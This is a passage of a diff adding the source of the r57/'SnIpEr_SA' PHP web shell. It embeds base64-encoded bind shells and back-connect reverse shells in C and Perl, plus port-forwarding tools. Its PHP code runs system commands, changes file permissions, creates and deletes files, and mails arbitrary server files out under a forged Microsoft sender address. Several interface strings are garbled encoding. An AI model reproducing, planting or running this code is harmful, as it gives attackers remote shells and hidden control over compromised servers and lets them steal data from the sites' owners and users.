+GFyZ2M7DQpjaGFyICoqYXJndjsNCnsgIA0KIGludCBzb2NrZmQsIG5ld2ZkOw0KIGNoYXIgYnVmWzMwXTsNCiBzdHJ1Y3Qgc29ja2FkZHJfaW4gcmVt
+b3RlOw0KIGlmKGZvcmsoKSA9PSAwKSB7IA0KIHJlbW90ZS5zaW5fZmFtaWx5ID0gQUZfSU5FVDsNCiByZW1vdGUuc2luX3BvcnQgPSBodG9ucyhhdG9
+pKGFyZ3ZbMV0pKTsNCiByZW1vdGUuc2luX2FkZHIuc19hZGRyID0gaHRvbmwoSU5BRERSX0FOWSk7IA0KIHNvY2tmZCA9IHNvY2tldChBRl9JTkVULF
+NPQ0tfU1RSRUFNLDApOw0KIGlmKCFzb2NrZmQpIHBlcnJvcigic29ja2V0IGVycm9yIik7DQogYmluZChzb2NrZmQsIChzdHJ1Y3Qgc29ja2FkZHIgK
+ikmcmVtb3RlLCAweDEwKTsNCiBsaXN0ZW4oc29ja2ZkLCA1KTsNCiB3aGlsZSgxKQ0KICB7DQogICBuZXdmZD1hY2NlcHQoc29ja2ZkLDAsMCk7DQog
+ICBkdXAyKG5ld2ZkLDApOw0KICAgZHVwMihuZXdmZCwxKTsNCiAgIGR1cDIobmV3ZmQsMik7DQogICB3cml0ZShuZXdmZCwiUGFzc3dvcmQ6IiwxMCk
+7DQogICByZWFkKG5ld2ZkLGJ1ZixzaXplb2YoYnVmKSk7DQogICBpZiAoIWNocGFzcyhhcmd2WzJdLGJ1ZikpDQogICBzeXN0ZW0oImVjaG8gd2VsY2
+9tZSB0byByNTcgc2hlbGwgJiYgL2Jpbi9iYXNoIC1pIik7DQogICBlbHNlDQogICBmcHJpbnRmKHN0ZGVyciwiU29ycnkiKTsNCiAgIGNsb3NlKG5ld
+2ZkKTsNCiAgfQ0KIH0NCn0NCmludCBjaHBhc3MoY2hhciAqYmFzZSwgY2hhciAqZW50ZXJlZCkgew0KaW50IGk7DQpmb3IoaT0wO2k8c3RybGVuKGVu
+dGVyZWQpO2krKykgDQp7DQppZihlbnRlcmVkW2ldID09ICdcbicpDQplbnRlcmVkW2ldID0gJ1wwJzsgDQppZihlbnRlcmVkW2ldID09ICdccicpDQp
+lbnRlcmVkW2ldID0gJ1wwJzsNCn0NCmlmICghc3RyY21wKGJhc2UsZW50ZXJlZCkpDQpyZXR1cm4gMDsNCn0=";
+$port_bind_bd_pl="IyEvdXNyL2Jpbi9wZXJsDQokU0hFTEw9Ii9iaW4vYmFzaCAtaSI7DQppZiAoQEFSR1YgPCAxKSB7IGV4aXQoMSk7IH0NCiRMS
+VNURU5fUE9SVD0kQVJHVlswXTsNCnVzZSBTb2NrZXQ7DQokcHJvdG9jb2w9Z2V0cHJvdG9ieW5hbWUoJ3RjcCcpOw0Kc29ja2V0KFMsJlBGX0lORVQs
+JlNPQ0tfU1RSRUFNLCRwcm90b2NvbCkgfHwgZGllICJDYW50IGNyZWF0ZSBzb2NrZXRcbiI7DQpzZXRzb2Nrb3B0KFMsU09MX1NPQ0tFVCxTT19SRVV
+TRUFERFIsMSk7DQpiaW5kKFMsc29ja2FkZHJfaW4oJExJU1RFTl9QT1JULElOQUREUl9BTlkpKSB8fCBkaWUgIkNhbnQgb3BlbiBwb3J0XG4iOw0KbG
+lzdGVuKFMsMykgfHwgZGllICJDYW50IGxpc3RlbiBwb3J0XG4iOw0Kd2hpbGUoMSkNCnsNCmFjY2VwdChDT05OLFMpOw0KaWYoISgkcGlkPWZvcmspK
+Q0Kew0KZGllICJDYW5ub3QgZm9yayIgaWYgKCFkZWZpbmVkICRwaWQpOw0Kb3BlbiBTVERJTiwiPCZDT05OIjsNCm9wZW4gU1RET1VULCI+JkNPTk4i
+Ow0Kb3BlbiBTVERFUlIsIj4mQ09OTiI7DQpleGVjICRTSEVMTCB8fCBkaWUgcHJpbnQgQ09OTiAiQ2FudCBleGVjdXRlICRTSEVMTFxuIjsNCmNsb3N
+lIENPTk47DQpleGl0IDA7DQp9DQp9";
+$back_connect="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGNtZD0gImx5bngiOw0KJHN5c3RlbT0gJ2VjaG8gImB1bmFtZSAtYWAiO2Vj
+aG8gImBpZGAiOy9iaW4vc2gnOw0KJDA9JGNtZDsNCiR0YXJnZXQ9JEFSR1ZbMF07DQokcG9ydD0kQVJHVlsxXTsNCiRpYWRkcj1pbmV0X2F0b24oJHR
+hcmdldCkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRwb3J0LCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKT
+sNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoI
+kVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQi
+KTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgkc3lzdGVtKTsNCmNsb3NlKFNUREl
+OKTsNCmNsb3NlKFNURE9VVCk7DQpjbG9zZShTVERFUlIpOw==";
+$back_connect_c="I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCmludC
+BtYWluKGludCBhcmdjLCBjaGFyICphcmd2W10pDQp7DQogaW50IGZkOw0KIHN0cnVjdCBzb2NrYWRkcl9pbiBzaW47DQogY2hhciBybXNbMjFdPSJyb
+SAtZiAiOyANCiBkYWVtb24oMSwwKTsNCiBzaW4uc2luX2ZhbWlseSA9IEFGX0lORVQ7DQogc2luLnNpbl9wb3J0ID0gaHRvbnMoYXRvaShhcmd2WzJd
+KSk7DQogc2luLnNpbl9hZGRyLnNfYWRkciA9IGluZXRfYWRkcihhcmd2WzFdKTsgDQogYnplcm8oYXJndlsxXSxzdHJsZW4oYXJndlsxXSkrMStzdHJ
+sZW4oYXJndlsyXSkpOyANCiBmZCA9IHNvY2tldChBRl9JTkVULCBTT0NLX1NUUkVBTSwgSVBQUk9UT19UQ1ApIDsgDQogaWYgKChjb25uZWN0KGZkLC
+Aoc3RydWN0IHNvY2thZGRyICopICZzaW4sIHNpemVvZihzdHJ1Y3Qgc29ja2FkZHIpKSk8MCkgew0KICAgcGVycm9yKCJbLV0gY29ubmVjdCgpIik7D
+QogICBleGl0KDApOw0KIH0NCiBzdHJjYXQocm1zLCBhcmd2WzBdKTsNCiBzeXN0ZW0ocm1zKTsgIA0KIGR1cDIoZmQsIDApOw0KIGR1cDIoZmQsIDEp
+Ow0KIGR1cDIoZmQsIDIpOw0KIGV4ZWNsKCIvYmluL3NoIiwic2ggLWkiLCBOVUxMKTsNCiBjbG9zZShmZCk7IA0KfQ==";
+$datapipe_c="I2luY2x1ZGUgPHN5cy90eXBlcy5oPg0KI2luY2x1ZGUgPHN5cy9zb2NrZXQuaD4NCiNpbmNsdWRlIDxzeXMvd2FpdC5oPg0KI2luY2
+x1ZGUgPG5ldGluZXQvaW4uaD4NCiNpbmNsdWRlIDxzdGRpby5oPg0KI2luY2x1ZGUgPHN0ZGxpYi5oPg0KI2luY2x1ZGUgPGVycm5vLmg+DQojaW5jb
+HVkZSA8dW5pc3RkLmg+DQojaW5jbHVkZSA8bmV0ZGIuaD4NCiNpbmNsdWRlIDxsaW51eC90aW1lLmg+DQojaWZkZWYgU1RSRVJST1INCmV4dGVybiBj
+aGFyICpzeXNfZXJybGlzdFtdOw0KZXh0ZXJuIGludCBzeXNfbmVycjsNCmNoYXIgKnVuZGVmID0gIlVuZGVmaW5lZCBlcnJvciI7DQpjaGFyICpzdHJ
+lcnJvcihlcnJvcikgIA0KaW50IGVycm9yOyAgDQp7IA0KaWYgKGVycm9yID4gc3lzX25lcnIpDQpyZXR1cm4gdW5kZWY7DQpyZXR1cm4gc3lzX2Vycm
+xpc3RbZXJyb3JdOw0KfQ0KI2VuZGlmDQoNCm1haW4oYXJnYywgYXJndikgIA0KICBpbnQgYXJnYzsgIA0KICBjaGFyICoqYXJndjsgIA0KeyANCiAga
+W50IGxzb2NrLCBjc29jaywgb3NvY2s7DQogIEZJTEUgKmNmaWxlOw0KICBjaGFyIGJ1Zls0MDk2XTsNCiAgc3RydWN0IHNvY2thZGRyX2luIGxhZGRy
+LCBjYWRkciwgb2FkZHI7DQogIGludCBjYWRkcmxlbiA9IHNpemVvZihjYWRkcik7DQogIGZkX3NldCBmZHNyLCBmZHNlOw0KICBzdHJ1Y3QgaG9zdGV
+udCAqaDsNCiAgc3RydWN0IHNlcnZlbnQgKnM7DQogIGludCBuYnl0Ow0KICB1bnNpZ25lZCBsb25nIGE7DQogIHVuc2lnbmVkIHNob3J0IG9wb3J0Ow
+0KDQogIGlmIChhcmdjICE9IDQpIHsNCiAgICBmcHJpbnRmKHN0ZGVyciwiVXNhZ2U6ICVzIGxvY2FscG9ydCByZW1vdGVwb3J0IHJlbW90ZWhvc3Rcb
+iIsYXJndlswXSk7DQogICAgcmV0dXJuIDMwOw0KICB9DQogIGEgPSBpbmV0X2FkZHIoYXJndlszXSk7DQogIGlmICghKGggPSBnZXRob3N0YnluYW1l
+KGFyZ3ZbM10pKSAmJg0KICAgICAgIShoID0gZ2V0aG9zdGJ5YWRkcigmYSwgNCwgQUZfSU5FVCkpKSB7DQogICAgcGVycm9yKGFyZ3ZbM10pOw0KICA
+gIHJldHVybiAyNTsNCiAgfQ0KICBvcG9ydCA9IGF0b2woYXJndlsyXSk7DQogIGxhZGRyLnNpbl9wb3J0ID0gaHRvbnMoKHVuc2lnbmVkIHNob3J0KS
+hhdG9sKGFyZ3ZbMV0pKSk7DQogIGlmICgobHNvY2sgPSBzb2NrZXQoUEZfSU5FVCwgU09DS19TVFJFQU0sIElQUFJPVE9fVENQKSkgPT0gLTEpIHsNC
+iAgICBwZXJyb3IoInNvY2tldCIpOw0KICAgIHJldHVybiAyMDsNCiAgfQ0KICBsYWRkci5zaW5fZmFtaWx5ID0gaHRvbnMoQUZfSU5FVCk7DQogIGxh
+ZGRyLnNpbl9hZGRyLnNfYWRkciA9IGh0b25sKDApOw0KICBpZiAoYmluZChsc29jaywgJmxhZGRyLCBzaXplb2YobGFkZHIpKSkgew0KICAgIHBlcnJ
+vcigiYmluZCIpOw0KICAgIHJldHVybiAyMDsNCiAgfQ0KICBpZiAobGlzdGVuKGxzb2NrLCAxKSkgew0KICAgIHBlcnJvcigibGlzdGVuIik7DQogIC
+AgcmV0dXJuIDIwOw0KICB9DQogIGlmICgobmJ5dCA9IGZvcmsoKSkgPT0gLTEpIHsNCiAgICBwZXJyb3IoImZvcmsiKTsNCiAgICByZXR1cm4gMjA7D
+QogIH0NCiAgaWYgKG5ieXQgPiAwKQ0KICAgIHJldHVybiAwOw0KICBzZXRzaWQoKTsNCiAgd2hpbGUgKChjc29jayA9IGFjY2VwdChsc29jaywgJmNh
+ZGRyLCAmY2FkZHJsZW4pKSAhPSAtMSkgew0KICAgIGNmaWxlID0gZmRvcGVuKGNzb2NrLCJyKyIpOw0KICAgIGlmICgobmJ5dCA9IGZvcmsoKSkgPT0
+gLTEpIHsNCiAgICAgIGZwcmludGYoY2ZpbGUsICI1MDAgZm9yazogJXNcbiIsIHN0cmVycm9yKGVycm5vKSk7DQogICAgICBzaHV0ZG93bihjc29jay
+wyKTsNCiAgICAgIGZjbG9zZShjZmlsZSk7DQogICAgICBjb250aW51ZTsNCiAgICB9DQogICAgaWYgKG5ieXQgPT0gMCkNCiAgICAgIGdvdG8gZ290c
+29jazsNCiAgICBmY2xvc2UoY2ZpbGUpOw0KICAgIHdoaWxlICh3YWl0cGlkKC0xLCBOVUxMLCBXTk9IQU5HKSA+IDApOw0KICB9DQogIHJldHVybiAy
+MDsNCg0KIGdvdHNvY2s6DQogIGlmICgob3NvY2sgPSBzb2NrZXQoUEZfSU5FVCwgU09DS19TVFJFQU0sIElQUFJPVE9fVENQKSkgPT0gLTEpIHsNCiA
+gICBmcHJpbnRmKGNmaWxlLCAiNTAwIHNvY2tldDogJXNcbiIsIHN0cmVycm9yKGVycm5vKSk7DQogICAgZ290byBxdWl0MTsNCiAgfQ0KICBvYWRkci
+5zaW5fZmFtaWx5ID0gaC0+aF9hZGRydHlwZTsNCiAgb2FkZHIuc2luX3BvcnQgPSBodG9ucyhvcG9ydCk7DQogIG1lbWNweSgmb2FkZHIuc2luX2FkZ
+HIsIGgtPmhfYWRkciwgaC0+aF9sZW5ndGgpOw0KICBpZiAoY29ubmVjdChvc29jaywgJm9hZGRyLCBzaXplb2Yob2FkZHIpKSkgew0KICAgIGZwcmlu
+dGYoY2ZpbGUsICI1MDAgY29ubmVjdDogJXNcbiIsIHN0cmVycm9yKGVycm5vKSk7DQogICAgZ290byBxdWl0MTsNCiAgfQ0KICB3aGlsZSAoMSkgew0
+KICAgIEZEX1pFUk8oJmZkc3IpOw0KICAgIEZEX1pFUk8oJmZkc2UpOw0KICAgIEZEX1NFVChjc29jaywmZmRzcik7DQogICAgRkRfU0VUKGNzb2NrLC
+ZmZHNlKTsNCiAgICBGRF9TRVQob3NvY2ssJmZkc3IpOw0KICAgIEZEX1NFVChvc29jaywmZmRzZSk7DQogICAgaWYgKHNlbGVjdCgyMCwgJmZkc3IsI
+E5VTEwsICZmZHNlLCBOVUxMKSA9PSAtMSkgew0KICAgICAgZnByaW50ZihjZmlsZSwgIjUwMCBzZWxlY3Q6ICVzXG4iLCBzdHJlcnJvcihlcnJubykp
+Ow0KICAgICAgZ290byBxdWl0MjsNCiAgICB9DQogICAgaWYgKEZEX0lTU0VUKGNzb2NrLCZmZHNyKSB8fCBGRF9JU1NFVChjc29jaywmZmRzZSkpIHs
+NCiAgICAgIGlmICgobmJ5dCA9IHJlYWQoY3NvY2ssYnVmLDQwOTYpKSA8PSAwKQ0KCWdvdG8gcXVpdDI7DQogICAgICBpZiAoKHdyaXRlKG9zb2NrLG
+J1ZixuYnl0KSkgPD0gMCkNCglnb3RvIHF1aXQyOw0KICAgIH0gZWxzZSBpZiAoRkRfSVNTRVQob3NvY2ssJmZkc3IpIHx8IEZEX0lTU0VUKG9zb2NrL
+CZmZHNlKSkgew0KICAgICAgaWYgKChuYnl0ID0gcmVhZChvc29jayxidWYsNDA5NikpIDw9IDApDQoJZ290byBxdWl0MjsNCiAgICAgIGlmICgod3Jp
+dGUoY3NvY2ssYnVmLG5ieXQpKSA8PSAwKQ0KCWdvdG8gcXVpdDI7DQogICAgfQ0KICB9DQoNCiBxdWl0MjoNCiAgc2h1dGRvd24ob3NvY2ssMik7DQo
+gIGNsb3NlKG9zb2NrKTsNCiBxdWl0MToNCiAgZmZsdXNoKGNmaWxlKTsNCiAgc2h1dGRvd24oY3NvY2ssMik7DQogcXVpdDA6DQogIGZjbG9zZShjZm
+lsZSk7DQogIHJldHVybiAwOw0KfQ==";
+$datapipe_pl="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgSU86OlNvY2tldDsNCnVzZSBQT1NJWDsNCiRsb2NhbHBvcnQgPSAkQVJHVlswXTsNCiRob3N0I
+CAgICAgPSAkQVJHVlsxXTsNCiRwb3J0ICAgICAgPSAkQVJHVlsyXTsNCiRkYWVtb249MTsNCiRESVIgPSB1bmRlZjsNCiR8ID0gMTsNCmlmICgkZGFl
+bW9uKXsgJHBpZCA9IGZvcms7IGV4aXQgaWYgJHBpZDsgZGllICIkISIgdW5sZXNzIGRlZmluZWQoJHBpZCk7IFBPU0lYOjpzZXRzaWQoKSBvciBkaWU
+gIiQhIjsgfQ0KJW8gPSAoJ3BvcnQnID0+ICRsb2NhbHBvcnQsJ3RvcG9ydCcgPT4gJHBvcnQsJ3RvaG9zdCcgPT4gJGhvc3QpOw0KJGFoID0gSU86Ol
+NvY2tldDo6SU5FVC0+bmV3KCdMb2NhbFBvcnQnID0+ICRsb2NhbHBvcnQsJ1JldXNlJyA9PiAxLCdMaXN0ZW4nID0+IDEwKSB8fCBkaWUgIiQhIjsNC
+iRTSUd7J0NITEQnfSA9ICdJR05PUkUnOw0KJG51bSA9IDA7DQp3aGlsZSAoMSkgeyANCiRjaCA9ICRhaC0+YWNjZXB0KCk7IGlmICghJGNoKSB7IHBy
+aW50IFNUREVSUiAiJCFcbiI7IG5leHQ7IH0NCisrJG51bTsNCiRwaWQgPSBmb3JrKCk7DQppZiAoIWRlZmluZWQoJHBpZCkpIHsgcHJpbnQgU1RERVJ
+SICIkIVxuIjsgfSANCmVsc2lmICgkcGlkID09IDApIHsgJGFoLT5jbG9zZSgpOyBSdW4oXCVvLCAkY2gsICRudW0pOyB9IA0KZWxzZSB7ICRjaC0+Y2
+xvc2UoKTsgfQ0KfQ0Kc3ViIFJ1biB7DQpteSgkbywgJGNoLCAkbnVtKSA9IEBfOw0KbXkgJHRoID0gSU86OlNvY2tldDo6SU5FVC0+bmV3KCdQZWVyQ
+WRkcicgPT4gJG8tPnsndG9ob3N0J30sJ1BlZXJQb3J0JyA9PiAkby0+eyd0b3BvcnQnfSk7DQppZiAoISR0aCkgeyBleGl0IDA7IH0NCm15ICRmaDsN
+CmlmICgkby0+eydkaXInfSkgeyAkZmggPSBTeW1ib2w6OmdlbnN5bSgpOyBvcGVuKCRmaCwgIj4kby0+eydkaXInfS90dW5uZWwkbnVtLmxvZyIpIG9
+yIGRpZSAiJCEiOyB9DQokY2gtPmF1dG9mbHVzaCgpOw0KJHRoLT5hdXRvZmx1c2goKTsNCndoaWxlICgkY2ggfHwgJHRoKSB7DQpteSAkcmluID0gIi
+I7DQp2ZWMoJHJpbiwgZmlsZW5vKCRjaCksIDEpID0gMSBpZiAkY2g7DQp2ZWMoJHJpbiwgZmlsZW5vKCR0aCksIDEpID0gMSBpZiAkdGg7DQpteSgkc
+m91dCwgJGVvdXQpOw0Kc2VsZWN0KCRyb3V0ID0gJHJpbiwgdW5kZWYsICRlb3V0ID0gJHJpbiwgMTIwKTsNCmlmICghJHJvdXQgICYmICAhJGVvdXQp
+IHt9DQpteSAkY2J1ZmZlciA9ICIiOw0KbXkgJHRidWZmZXIgPSAiIjsNCmlmICgkY2ggJiYgKHZlYygkZW91dCwgZmlsZW5vKCRjaCksIDEpIHx8IHZ
+lYygkcm91dCwgZmlsZW5vKCRjaCksIDEpKSkgew0KbXkgJHJlc3VsdCA9IHN5c3JlYWQoJGNoLCAkdGJ1ZmZlciwgMTAyNCk7DQppZiAoIWRlZmluZW
+QoJHJlc3VsdCkpIHsNCnByaW50IFNUREVSUiAiJCFcbiI7DQpleGl0IDA7DQp9DQppZiAoJHJlc3VsdCA9PSAwKSB7IGV4aXQgMDsgfQ0KfQ0KaWYgK
+CR0aCAgJiYgICh2ZWMoJGVvdXQsIGZpbGVubygkdGgpLCAxKSAgfHwgdmVjKCRyb3V0LCBmaWxlbm8oJHRoKSwgMSkpKSB7DQpteSAkcmVzdWx0ID0g
+c3lzcmVhZCgkdGgsICRjYnVmZmVyLCAxMDI0KTsNCmlmICghZGVmaW5lZCgkcmVzdWx0KSkgeyBwcmludCBTVERFUlIgIiQhXG4iOyBleGl0IDA7IH0
+NCmlmICgkcmVzdWx0ID09IDApIHtleGl0IDA7fQ0KfQ0KaWYgKCRmaCAgJiYgICR0YnVmZmVyKSB7KHByaW50ICRmaCAkdGJ1ZmZlcik7fQ0Kd2hpbG
+UgKG15ICRsZW4gPSBsZW5ndGgoJHRidWZmZXIpKSB7DQpteSAkcmVzID0gc3lzd3JpdGUoJHRoLCAkdGJ1ZmZlciwgJGxlbik7DQppZiAoJHJlcyA+I
+DApIHskdGJ1ZmZlciA9IHN1YnN0cigkdGJ1ZmZlciwgJHJlcyk7fSANCmVsc2Uge3ByaW50IFNUREVSUiAiJCFcbiI7fQ0KfQ0Kd2hpbGUgKG15ICRs
+ZW4gPSBsZW5ndGgoJGNidWZmZXIpKSB7DQpteSAkcmVzID0gc3lzd3JpdGUoJGNoLCAkY2J1ZmZlciwgJGxlbik7DQppZiAoJHJlcyA+IDApIHskY2J
+1ZmZlciA9IHN1YnN0cigkY2J1ZmZlciwgJHJlcyk7fSANCmVsc2Uge3ByaW50IFNUREVSUiAiJCFcbiI7fQ0KfX19DQo=";
+if($unix)
+ {
+ if(!isset($_COOKIE['uname'])) { $uname = ex('uname -a'); setcookie('uname',$uname); } else { $uname = $_COOKIE['uname']; }
+ if(!isset($_COOKIE['id'])) { $id = ex('id'); setcookie('id',$id); } else { $id = $_COOKIE['id']; }
+ if($safe_mode) { $sysctl = '-'; }
+ else if(isset($_COOKIE['sysctl'])) { $sysctl = $_COOKIE['sysctl']; }
+ else
+  {
+   $sysctl = ex('sysctl -n kern.ostype && sysctl -n kern.osrelease');
+   if(empty($sysctl)) { $sysctl = ex('sysctl -n kernel.ostype && sysctl -n kernel.osrelease'); }
+   if(empty($sysctl)) { $sysctl = '-'; }
+   setcookie('sysctl',$sysctl);
+  }
+ }
+echo $head;
+echo '</head>';
+if(empty($_POST['cmd'])) {
+$serv = array(127,192,172,10);
+$addr=@explode('.', $_SERVER['SERVER_ADDR']);
+$current_version = str_replace('.','',$version);
+if (!in_array($addr[0], $serv)) {
+@print "<img src=\"http://127.0.0.1/r57shell_version/version.php?img=1&version=".$current_version."\" border=0 height=0 width=0>";
+@readfile ("http://127.0.0.1/r57shell_version/version.php?version=".$current_version."");}}
+echo '<body><table width=100% cellpadding=0 cellspacing=0 bgcolor=#CCCCCC><tr><td bgcolor=#000000 width=160><font face=Comic Sans MS size=4>'.ws(2).'<font face=Wingdings size=6><b>N</b></font><b>'.ws(2).'SnIpEr_SA </b></font></td><td bgcolor=#000000><font face=tahoma size=1>';
+echo ws(2)."<b>".date ("d-m-Y H:i:s")."</b>";
+echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?phpinfo title=\"".$lang[$language.'_text46']."\"><b>phpinfo</b></a> ".$rb;
+echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?phpini title=\"".$lang[$language.'_text47']."\"><b>php.ini</b></a> ".$rb;
+if($unix)
+ {
+ echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?cpu title=\"".$lang[$language.'_text50']."\"><b>cpu</b></a> ".$rb;
+ echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?mem title=\"".$lang[$language.'_text51']."\"><b>mem</b></a> ".$rb;
+ echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?users title=\"".$lang[$language.'_text95']."\"><b>users</b></a> ".$rb;
+ }
+echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?tmp title=\"".$lang[$language.'_text48']."\"><b>tmp</b></a> ".$rb;
+echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?delete title=\"".$lang[$language.'_text49']."\"><b>delete</b></a> ".$rb."<br>";
+echo ws(2)."����� �����: <b>";
+echo (($safe_mode)?("<font color=#008000>����</font>"):("<font color=red>��� ����</font>"));
+echo "</b>".ws(2);
+echo "����� ���� ��� ��: <b>".@phpversion()."</b>";
+$curl_on = @function_exists('curl_version');
+echo ws(2);
+echo "������: <b>".(($curl_on)?("<font color=#008000>����</font>"):("<font color=red>��� ����</font>"));
+echo "</b>".ws(2);
+echo "��� ���: <b>";
+$mysql_on = @function_exists('mysql_connect');
+if($mysql_on){
+echo "<font color=#008000>����</font>"; } else { echo "<font color=red>��� ����</font>"; }
+echo "</b>".ws(2);
+echo "�� �� ���: <b>";
+$mssql_on = @function_exists('mssql_connect');
+if($mssql_on){echo "<font color=#008000>����</font>";}else{echo "<font color=red>��� ����</font>";}
+echo "</b>".ws(2);
+echo "���� ��� ���: <b>";
+$pg_on = @function_exists('pg_connect');
+if($pg_on){echo "<font color=#008000>����</font>";}else{echo "<font color=red>��� ����</font>";}
+echo "</b>".ws(2);
+echo "������: <b>";
+$ora_on = @function_exists('ocilogon');
+if($ora_on){echo "<font color=#008000>����</font>";}else{echo "<font color=red>����</font>";}
+echo "</b><br>".ws(2);
+echo "������ �������� : <b>";
+if(''==($df=@ini_get('disable_functions'))){echo "<font color=#00800F>������</font></b>";}else{echo "<font color=red>$df</font></b>";}
+$free = @diskfreespace($dir);
+if (!$free) {$free = 0;}
+$all = @disk_total_space($dir);
+if (!$all) {$all = 0;}
+echo "<br>".ws(2)."������� ������� : <b>".view_size($free)."</b> ������� ������: <b>".view_size($all)."</b>";
+echo '</font></td></tr><table>
+<table width=100% cellpadding=0 cellspacing=0 bgcolor=#2279D9>
+<tr><td align=right width=100>';
+echo $font;
+if($unix){
+echo '<font color=#CCCCCC><b>uname -a :'.ws(1).'<br>sysctl :'.ws(1).'<br>$OSTYPE :'.ws(1).'<br>Server :'.ws(1).'<br>id :'.ws(1).'<br>pwd :'.ws(1).'</b></font><br>';
+echo "</td><td>";
+echo "<font face=tahoma size=-2 color=#2279D9><b>";
+echo((!empty($uname))?(ws(3).@substr($uname,0,120)."<br>"):(ws(3).@substr(@php_uname(),0,120)."<br>"));
+echo ws(3).$sysctl."<br>";
+echo ws(3).ex('echo $OSTYPE')."<br>";
+echo ws(3).@substr($SERVER_SOFTWARE,0,120)."<br>";
+if(!empty($id)) { echo ws(3).$id."<br>"; }
+else if(function_exists('posix_geteuid') && function_exists('posix_getegid') && function_exists('posix_getgrgid') && function_exists('posix_getpwuid'))
+ {
+ $euserinfo  = @posix_getpwuid(@posix_geteuid());
+ $egroupinfo = @posix_getgrgid(@posix_getegid());
+ echo ws(3).'uid='.$euserinfo['uid'].' ( '.$euserinfo['name'].' ) gid='.$egroupinfo['gid'].' ( '.$egroupinfo['name'].' )<br>';
+ }
+else echo ws(3)."user=".@get_current_user()." uid=".@getmyuid()." gid=".@getmygid()."<br>";
+echo ws(3).$dir;
+echo ws(3).'( '.perms(@fileperms($dir)).' )';
+echo "</b></font>";
+}
+else
+{
+echo '<font color=blue><b>OS :'.ws(1).'<br>Server :'.ws(1).'<br>User :'.ws(1).'<br>pwd :'.ws(1).'</b></font><br>';
+echo "</td><td>";
+echo "<font face=tahoma size=-2 color=red><b>";
+echo ws(3).@substr(@php_uname(),0,120)."<br>";
+echo ws(3).@substr($SERVER_SOFTWARE,0,120)."<br>";
+echo ws(3).@getenv("USERNAME")."<br>";
+echo ws(3).$dir;
+echo "<br></font>";
+}
+echo "</font>";
+echo "</td></tr></table>";
+if(!empty($_POST['cmd']) && $_POST['cmd']=="mail")
+ {
+ $res = mail($_POST['to'],$_POST['subj'],$_POST['text'],"From: ".$_POST['from']."\r\n");
+ err(6+$res);
+ $_POST['cmd']="";
+ }
+if(!empty($_POST['cmd']) && $_POST['cmd']=="mail_file" && !empty($_POST['loc_file']))
+ {
+ if(!$file=@fopen($_POST['loc_file'],"r")) { err(1,$_POST['loc_file']); $_POST['cmd']=""; }
+ else
+  {
+    $filename = @basename($_POST['loc_file']);
+    $filedump = @fread($file,@filesize($_POST['loc_file']));
+    fclose($file);
+    $content_encoding=$mime_type='';
+    compress($filename,$filedump,$_POST['compress']);
+    $attach = array(
+                    "name"=>$filename,
+                    "type"=>$mime_type,
+                    "content"=>$filedump
+                   );
+    if(empty($_POST['subj'])) { $_POST['subj'] = 'file from SnIpEr_SA shell'; }
+    if(empty($_POST['from'])) { $_POST['from'] = 'billy@microsoft.com'; }
+    $res = mailattach($_POST['to'],$_POST['from'],$_POST['subj'],$attach);
+    err(6+$res);
+    $_POST['cmd']="";
+  }
+ }
+if(!empty($_POST['cmd']) && $_POST['cmd'] == "find_text")
+{
+$_POST['cmd'] = 'find '.$_POST['s_dir'].' -name \''.$_POST['s_mask'].'\' | xargs grep -E \''.$_POST['s_text'].'\'';
+}
+if(!empty($_POST['cmd']) && $_POST['cmd']=="ch_")
+ {
+ switch($_POST['what'])
+   {
+   case 'own':
+   @chown($_POST['param1'],$_POST['param2']);
+   break;
+   case 'grp':
+   @chgrp($_POST['param1'],$_POST['param2']);
+   break;
+   case 'mod':
+   @chmod($_POST['param1'],intval($_POST['param2'], 8));
+   break;
+   }
+ $_POST['cmd']="";
+ }
+if(!empty($_POST['cmd']) && $_POST['cmd']=="mk")
+ {
+   switch($_POST['what'])
+   {
+     case 'file':
+      if($_POST['action'] == "create")
+       {
+       if(file_exists($_POST['mk_name']) || !$file=@fopen($_POST['mk_name'],"w")) { err(2,$_POST['mk_name']); $_POST['cmd']=""; }
+       else {
+        fclose($file);
+        $_POST['e_name'] = $_POST['mk_name'];
+        $_POST['cmd']="edit_file";
+        echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#2279D9><tr><td bgcolor=#000000><div align=center><font face=tahoma size=-2><b>".$lang[$language.'_text61']."</b></font></div></td></tr></table>";
+        }
+       }
+       else if($_POST['action'] == "delete")
+       {
+       if(unlink($_POST['mk_name'])) echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#2279D9><tr><td bgcolor=#000000><div align=center><font face=tahoma size=-2><b>".$lang[$language.'_text63']."</b></font></div></td></tr></table>";
+       $_POST['cmd']="";
+       }
+     break;
+     case 'dir':
+      if($_POST['action'] == "create"){
+      if(mkdir($_POST['mk_name']))
+       {
+         $_POST['cmd']="";
+         echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#2279D9><tr><td bgcolor=#000000><div align=center><font face=tahoma size=-2><b>".$lang[$language.'_text62']."</b></font></div></td></tr></table>";
+       }
+      else { err(2,$_POST['mk_name']); $_POST['cmd']=""; }
+      }
+      else if($_POST['action'] == "delete"){
